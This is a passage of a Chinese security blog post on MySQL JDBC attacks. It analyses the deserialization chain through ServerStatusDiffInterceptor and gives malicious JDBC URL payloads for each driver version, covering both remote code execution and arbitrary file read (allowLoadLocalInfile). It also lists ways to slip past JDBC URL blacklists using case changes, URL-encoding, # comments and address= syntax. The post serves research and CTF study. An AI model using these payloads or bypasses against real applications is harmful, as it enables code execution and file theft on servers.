e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>成功捕获到流量：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760232242964-06ad94d0-4a01-449d-bdeb-2631d9b8d771.png"  alt="img"></p>
<p>右击任意一个，选择追踪TCP流。并改成show data as 原始数据：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760232305348-7fb9ddfd-8407-4452-b494-a9196fd4665c.png"  alt="img"></p>
<p>复制所有的16进制数据，使用python解码并输出到pcap</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;hex.txt&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = <span class="built_in">bytes</span>.fromhex(f.read())</span><br><span class="line">    <span class="built_in">open</span>(<span class="string">&quot;hex1.pcap&quot;</span>, <span class="string">&quot;wb&quot;</span>).write(data)</span><br></pre></td></tr></table></figure>

<p>得到的pcap文件就能够正常利用：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760232477651-6fb2837e-99c9-4c77-86f1-72b06ba30e43.png"  alt="img"></p>
<h2 id="踩坑记录"><a href="#踩坑记录" class="headerlink" title="踩坑记录"></a>踩坑记录</h2><p>现在回顾一下自己犯的错误。</p>
<p>1、直接导出特定分组，而没有跟踪TCP流</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760232624618-332c1110-0e9d-44cd-b508-e1bad9ce4088.png"  alt="img"></p>
<p>一开始就是按图片上的方式导出的，后来发现有问题。</p>
<p>2、遇到max Packet Allowed报错</p>
<p>按上面的方法导出后，尝试不出网攻击时，会报错max Packet Allowed，即包过大。当时以为要想办法把包缩小才行，没想到一开始导出的方式就错了。</p>
<h2 id="遗留问题"><a href="#遗留问题" class="headerlink" title="遗留问题"></a>遗留问题</h2><p><a class="link"   target="_blank" rel="noopener" href="https://github.com/Lotus6/JavaGadgetGenerator" >https://github.com/Lotus6/JavaGadgetGenerator<i class="fas fa-external-link-alt"></i></a></p>
<p>这个工具有一个MysqlPipe功能，但是我一直不知道怎么使用。</p>
<p>我现在是在正常使用ysoserial模块的基础上，额外勾选了MysqlPipe，然后将导出的文件直接作为pcap使用，但是不对。在这个工具发了issue，知道的师傅麻烦回复一下我。</p>
<p>作者回复：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761050233108-c90c466a-9fc7-429e-a340-2729635554a5.png"  alt="img"></p>
<p>另外，m4x师傅文章后半部分，如何利用springboot临时文件也很值得看。</p>
<h1 id="出网打法"><a href="#出网打法" class="headerlink" title="出网打法"></a>出网打法</h1><p>拿上面那个fakeServer直接用就行。或者使用网上现成的工具。</p>
<p>mysql jdbc 攻击还有一种读文件的打法，推荐使用 <a class="link"   target="_blank" rel="noopener" href="https://github.com/rmb122/rogue_mysql_server" >https://github.com/rmb122/rogue_mysql_server<i class="fas fa-external-link-alt"></i></a></p>
<p>下面简单分析一下利用过程。</p>
<h2 id="Exp"><a href="#Exp" class="headerlink" title="Exp"></a>Exp</h2><p>受害端：</p>
<p>利用前提：账号密码等参数可控，这样才能把那两个参数带上；连接的IP可控</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.sql.*;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        Class.forName(<span class="string">&quot;com.mysql.jdbc.Driver&quot;</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">jdbc_url</span> <span class="operator">=</span> <span class="string">&quot;jdbc:mysql://127.0.0.1:3306/test123?&quot;</span> +</span><br><span class="line">                <span class="string">&quot;autoDeserialize=true&quot;</span> +</span><br><span class="line">                <span class="string">&quot;&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&quot;</span>;</span><br><span class="line">        <span class="type">Connection</span> <span class="variable">con</span> <span class="operator">=</span> DriverManager.getConnection(jdbc_url, <span class="string">&quot;root&quot;</span>, <span class="string">&quot;root123&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>fakeServer还是用上面的就行。</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>当JDBC连接mysql时，会有几个内置的sql语句要执行。mysql的查询结果会以结果集的形式被JDBC接收。当结果集在JDBC上被处理时，会调用ObjectInputStream.readObject()进行反序列化，这个就是我们的入口。当我们可以控制JDBC去连接哪个mysql时，我们就可以让它连接我们的fake mysql，从而让返回的结果集为恶意数据，从而实现反序列化RCE。</p>
<p>内置的，可利用的两条查询语句：</p>
<ul>
<li>SHOW SESSION STATUS</li>
<li>SHOW COLLATION</li>
</ul>
<h2 id="链子"><a href="#链子" class="headerlink" title="链子"></a>链子</h2><p>既然是反序列化，那肯定要有链子。链子的后半部分直接用CC链就行了。关键是入口类要怎么找。在这里，我们希望入口类最好是在JDBC连接时被自动调用，这样就可以自动readObject()。</p>
<p>最终，可以找到com.mysql.cj.jdbc.result.ResultSetImpl，它的 getObject() 方法调用了 readObject() 方法：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049306370-209380ef-a2b7-4d84-8cd5-baed42906664.png"  alt="img"></p>
<p>JDBC 通过 MySQL 数据库查询数据会返回一个结果集，将查询到的结果返回给程序，并将结果封装在 ResultSetImpl 这个类中。</p>
<p>所以这个类不满足用户可控输入这一点，而且也不是会被自动调用的，所以我们应该要去找谁调用了 ResultSetImpl#getObject()。能够找到ResultSetUtil#resultSetToMap()：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049306309-befd3ec5-cbd9-49a6-8e40-1c1f9e708acf.png"  alt="img"></p>
<p>还是不满足条件，继续找，找到ServerStatusDiffInterceptor#populateMapWithSessionStatusValues：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049306390-a6145e9f-5de3-49a8-9c60-65b02c0e0c8d.png"  alt="img"></p>
<p>这里与mysql建立了连接，并且执行了我们上面说的可以利用的内置查询语句（查询的结果就是我们恶意伪造的数据），然而，还是没有实现自动调用，再找。找到ServerStatusDiffInterceptor#preProcess：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049306368-dd35fc13-aa09-4006-ad77-6c6cb8f947a2.png"  alt="img"></p>
<p>ServerStatusDiffInterceptor是一个拦截器，在 JDBC URL 中设定属性queryInterceptors为ServerStatusDiffInterceptor时，执行查询语句会调用拦截器的preProcess和postProcess方法，这是一个自动执行的过程，我们可以把它作为利用链头。这样链子就完整了。</p>
<h2 id="编写fakeServer"><a href="#编写fakeServer" class="headerlink" title="编写fakeServer"></a>编写fakeServer</h2><p>这里要先用wireshark抓mysql的数据包，然后用python写脚本伪造整个流程，从建立连接到返回查询结果。</p>
<p>可以参考：<a class="link"   target="_blank" rel="noopener" href="https://drun1baby.top/2023/01/13/MySQL-jdbc-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/" >https://drun1baby.top/2023/01/13/MySQL-jdbc-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>在这里打断点：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049453080-7ca7f8b1-d0de-4c20-a655-8f64cbe2a795.png"  alt="img"></p>
<p>然后在resultSetToMap()步入，进入该方法：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049452905-e49927d7-ff11-4e3e-94d3-c925b2def493.png"  alt="img"></p>
<p>然后在第二个getObject处步入，进入该方法，之后一直步过，直到switch判断，应该会进入case:BLOB：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049453262-132a25b9-06ff-41bc-b99a-7c038678cdd5.png"  alt="img"></p>
<p>图上写了几个关键点，最后就在readObject那边反序列化，后面的就是CC链的流程了。</p>
<h2 id="不同版本mysqlDriver的payload"><a href="#不同版本mysqlDriver的payload" class="headerlink" title="不同版本mysqlDriver的payload"></a>不同版本mysqlDriver的payload</h2><h3 id="8-x"><a href="#8-x" class="headerlink" title="8.x"></a>8.x</h3><p>反序列化数据：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;jdbc:mysql://127.0.0.1:3309/test?characterEncoding=UTF-8&amp;serverTimezone=Asia/Shanghai&quot;</span> +  </span><br><span class="line">        <span class="string">&quot;&amp;autoDeserialize=true&quot;</span> +  </span><br><span class="line">    <span class="string">&quot;&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>任意文件读：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test?allowLoadLocalInfile=<span class="literal">true</span>&amp;allowUrlInLocalInfile=<span class="literal">true</span>&amp;allowLoadLocalInfileInPath=/&amp;maxAllowedPacket=<span class="number">655360</span></span><br></pre></td></tr></table></figure>

<h3 id="6-x"><a href="#6-x" class="headerlink" title="6.x"></a>6.x</h3><p>属性名不同，queryInterceptors 换为 statementInterceptors</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor</span><br></pre></td></tr></table></figure>

<h3 id="5-1-29-5-1-40"><a href="#5-1-29-5-1-40" class="headerlink" title="5.1.29-5.1.40"></a>5.1.29-5.1.40</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&amp;autoDeserialize=true</span><br></pre></td></tr></table></figure>

<h3 id="5-1-19-5-1-28"><a href="#5-1-19-5-1-28" class="headerlink" title="5.1.19-5.1.28"></a>5.1.19-5.1.28</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true</span><br></pre></td></tr></table></figure>

<h3 id="5-1-11"><a href="#5-1-11" class="headerlink" title="&gt;&#x3D;5.1.11"></a>&gt;&#x3D;5.1.11</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor</span><br></pre></td></tr></table></figure>

<h3 id=""><a href="#" class="headerlink" title="&lt;&#x3D;5.1.10"></a>&lt;&#x3D;5.1.10</h3><p>同5.1.11但是需要连接后执行查询</p>
<h1 id="绕过技巧"><a href="#绕过技巧" class="headerlink" title="绕过技巧"></a>绕过技巧</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这里提到的绕过方法很基础。就是大小写，URL编码，参数拼接，#注释等，感觉跟php里的绕过很像。</p>
<p>具体代码参考<a class="link"   target="_blank" rel="noopener" href="https://github.com/Y4Sec-Team/mysql-jdbc-tricks" >https://github.com/Y4Sec-Team/mysql-jdbc-tricks<i class="fas fa-external-link-alt"></i></a></p>
<p>fake-mysql可以使用<a class="link"   target="_blank" rel="noopener" href="https://github.com/4ra1n/mysql-fake-server" >4ra1n&#x2F;mysql-fake-server: MySQL Fake Server (纯Java实现，支持GUI版和命令行版，提供Dockerfile，支持多种常见JDBC利用)<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><h3 id="注释符差异"><a href="#注释符差异" class="headerlink" title="注释符差异"></a>注释符差异</h3><p>8.0.x版本中，注释符为#，#后面的内容将被忽略。</p>
<p>8版本在解析connectionString的时候，最后一步query会根据正则匹配将</p>
<p>#后面的注释部分去掉。具体逻辑在下图中：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049706448-82afc88d-1ec6-48df-be8a-92ba7b7cd92b.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049706733-b00c16a3-515d-4252-89b6-f5961116c1c1.png"  alt="img"></p>
<p>可以看到#后面的内容不见了。</p>
<p>在5.1.x版本中，不可以使用#来注释，但是可以在最后拼接&amp;x&#x3D;来注释。</p>
<p>如：test?allowLoadLocalInfile&#x3D;true&amp;allowUrlInLocalInfile&#x3D;true&amp;maxAllowedPacket&#x3D;655360&amp;x&#x3D;</p>
<h3 id="参数名和参数值解析差异"><a href="#参数名和参数值解析差异" class="headerlink" title="参数名和参数值解析差异"></a>参数名和参数值解析差异</h3><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><p>如果是这样检查的：<img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1746446179939-f938031a-ce75-4d3a-9e0f-d01f7a78abe8.png"  alt="img"></p>
<p>那么可以直接大小写绕过。</p>
<p>由于mysql里是这样判断参数值的：BooleanPropertyDefinition#parseObject()<img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1746446187212-1c4ba217-f98a-40c4-a366-bbb0c68061a2.png"  alt="img"></p>
<p>所以大小写不影响autoDeserialize的结果。</p>
<p>另外，图片中看到YES和TRUE都可以，所以true被禁止时，不妨试试YES。还有，据说在低版本驱动中，1也可以。</p>
<h3 id="URL编码"><a href="#URL编码" class="headerlink" title="URL编码"></a>URL编码</h3><p>当检查通过URI类获取参数时，会自动解码URL，此时无法通过URL编码绕过，如下图：<img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1746446201925-61899172-9eb7-48f1-a3f2-3ae72f28be9f.png"  alt="img"></p>
<p>但是如果没有用URI类，那就可能存在URL编码绕过，如下图：<img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1746446208876-c5431ca2-1cf5-44cb-8dc6-4b5bd3cc4604.png"  alt="img"></p>
<p>另外，还有因为mysqlDriver版本产生的URL编码绕过。</p>
<p>如果黑名单检测的代码是这样写的，很有可能会存在绕过的问题。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">boolean</span> <span class="title function_">isValidUrl</span><span class="params">(String url)</span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(url.contains(<span class="string">&quot;allowLoadLocalInfile&quot;</span>)||url.contains(<span class="string">&quot;allowUrlInLocalInfile&quot;</span>)||url.contains(<span class="string">&quot;allowLoadLocalInfileInPath&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在8.0.x版本中，可以使用使用url编码的方式来对参数名和参数值进行编码。</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761049933479-488a6bb9-bf61-4663-9443-18505737b019.png"  alt="img"></p>
<p>jdbc:mysql:&#x2F;&#x2F;127.0.0.1:33060&#x2F;test?maxAllowedPacket&#x3D;655360&amp;characterEncoding&#x3D;utf-8&amp;allowUrlInLocalInfil%65&#x3D;%74%72%75%65# </p>
<p>allowUrlInLocalInfile，maxAllowedPacket这些字段都是可以url编码绕过的。</p>
<p>所以从原则上来讲用黑名单来过滤必须要先解码再进行匹配，不然可能会造成黑名单绕过的问题。</p>
<p>在5.1.x版本中，只有参数值可以编码绕过，参数名是没办法编码绕过的。</p>
<h3 id="参数拼接"><a href="#参数拼接" class="headerlink" title="参数拼接"></a>参数拼接</h3><p>这个很常用，就是在可控输入点输入一长串达到恶意拼接参数的效果，最后用#把后面的语句注释掉，跟sql注入有点像。</p>
<p>值得一提的是，6.x.x版本的mysql需要在末尾用&amp;#来注释，否则会报错，而8.x.x版本的#或&amp;#都可以。</p>
<p>报错如下：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1746446220683-7ec4109e-42c8-45a5-964c-2dbca4ac5fa4.png"  alt="img"></p>
<p>这里应该是6.x.x以&amp;来分割参数，所以并不会把#当作结束符，而是继续当作参数读取。最后就会导致参数格式不合法，从而产生报错。</p>
<h3 id="address绕过"><a href="#address绕过" class="headerlink" title="address绕过"></a>address绕过</h3><p>第一次遇到是在suctf2025的ezjava</p>
<p>通过jdbc连接时支持这种语法：jdbc:mysql:&#x2F;&#x2F;address&#x3D;(host&#x3D;myhost)(port&#x3D;1111)(key1&#x3D;value1)&#x2F;db</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://dev.mysqlserver.cn/doc/connector-j/en/connector-j-reference-jdbc-url-format.html" >https://dev.mysqlserver.cn/doc/connector-j/en/connector-j-reference-jdbc-url-format.html<i class="fas fa-external-link-alt"></i></a></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761117990078-bdee83f5-8479-4a6e-9c4d-0dad828b423e.png"  alt="img"></p>
<p>如果题目通过正则表达式匹配，可以通过这样的方法绕过，同时结合URL编码绕过关键字</p>
<p>不出网的参数有点特别，要这样写：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://dev.mysqlserver.cn/doc/connector-j/en/connector-j-named-pipe.html" >https://dev.mysqlserver.cn/doc/connector-j/en/connector-j-named-pipe.html<i class="fas fa-external-link-alt"></i></a></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1761117785079-a7bf4fa0-29b0-4b23-b9aa-8e84b777b499.png"  alt="img"></p>
<p>不同版本connectJ也许不一样，以官方文档为准。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a class="link"   target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng" >微信公众平台<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng" >JDBC Attack URL 绕过合集<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://drun1baby.top/2023/01/13/MySQL-jdbc-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/" >MySQL jdbc 反序列化分析 | Drunkbaby’s Blog<i class="fas fa-external-link-alt"></i></a></p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                MySQL JDBC Attack常规打法及绕过
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2025/05/05/mysql-JDBC-绕过/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">1diot9</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2025-05-05 19:58</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/05/05/sqlite%E6%94%BB%E5%87%BB/"
                                   title="sqlite攻击"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">sqlite攻击</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/05/05/WebHandler%E5%86%85%E5%AD%98%E9%A9%AC/"
                                   title="WebHandler内存马"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">WebHandler内存马</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%8D%E5%87%BA%E7%BD%91%E6%89%93%E6%B3%95"><span class="nav-number">1.</span> <span class="nav-text">不出网打法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86%E6%A6%82%E8%BF%B0"><span class="nav-number">1.1.</span> <span class="nav-text">原理概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pcap%E6%AD%A3%E5%B8%B8%E7%94%9F%E6%88%90"><span class="nav-number">1.2.</span> <span class="nav-text">pcap正常生成</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95"><span class="nav-number">1.3.</span> <span class="nav-text">踩坑记录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%81%97%E7%95%99%E9%97%AE%E9%A2%98"><span class="nav-number">1.4.</span> <span class="nav-text">遗留问题</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%87%BA%E7%BD%91%E6%89%93%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">出网打法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Exp"><span class="nav-number">2.1.</span> <span class="nav-text">Exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">2.2.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%93%BE%E5%AD%90"><span class="nav-number">2.3.</span> <span class="nav-text">链子</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BC%96%E5%86%99fakeServer"><span class="nav-number">2.4.</span> <span class="nav-text">编写fakeServer</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B0%83%E8%AF%95"><span class="nav-number">2.5.</span> <span class="nav-text">调试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8D%E5%90%8C%E7%89%88%E6%9C%ACmysqlDriver%E7%9A%84payload"><span class="nav-number">2.6.</span> <span class="nav-text">不同版本mysqlDriver的payload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#8-x"><span class="nav-number">2.6.1.</span> <span class="nav-text">8.x</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-x"><span class="nav-number">2.6.2.</span> <span class="nav-text">6.x</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-29-5-1-40"><span class="nav-number">2.6.3.</span> <span class="nav-text">5.1.29-5.1.40</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-19-5-1-28"><span class="nav-number">2.6.4.</span> <span class="nav-text">5.1.19-5.1.28</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-11"><span class="nav-number">2.6.5.</span> <span class="nav-text">&gt;&#x3D;5.1.11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-number">2.6.6.</span> <span class="nav-text">&lt;&#x3D;5.1.10</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="nav-number">3.</span> <span class="nav-text">绕过技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">3.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="nav-number">3.2.</span> <span class="nav-text">注意事项</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6%E5%B7%AE%E5%BC%82"><span class="nav-number">3.2.1.</span> <span class="nav-text">注释符差异</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E5%90%8D%E5%92%8C%E5%8F%82%E6%95%B0%E5%80%BC%E8%A7%A3%E6%9E%90%E5%B7%AE%E5%BC%82"><span class="nav-number">3.2.2.</span> <span class="nav-text">参数名和参数值解析差异</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">3.3.</span> <span class="nav-text">分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">3.3.1.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#URL%E7%BC%96%E7%A0%81"><span class="nav-number">3.3.2.</span> <span class="nav-text">URL编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E6%8B%BC%E6%8E%A5"><span class="nav-number">3.3.3.</span> <span class="nav-text">参数拼接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#address%E7%BB%95%E8%BF%87"><span class="nav-number">3.3.4.</span> <span class="nav-text">address绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">3.4.</span> <span class="nav-text">参考</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">1diot9</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    
        
        <div class="deploy-info info-item">
            
            本站由 <span class="tooltip" data-tooltip-content="GitHub Pages"><img src="/images/brands/github.png"></span> 提供部署服务
            
        </div>
    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">77.5k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
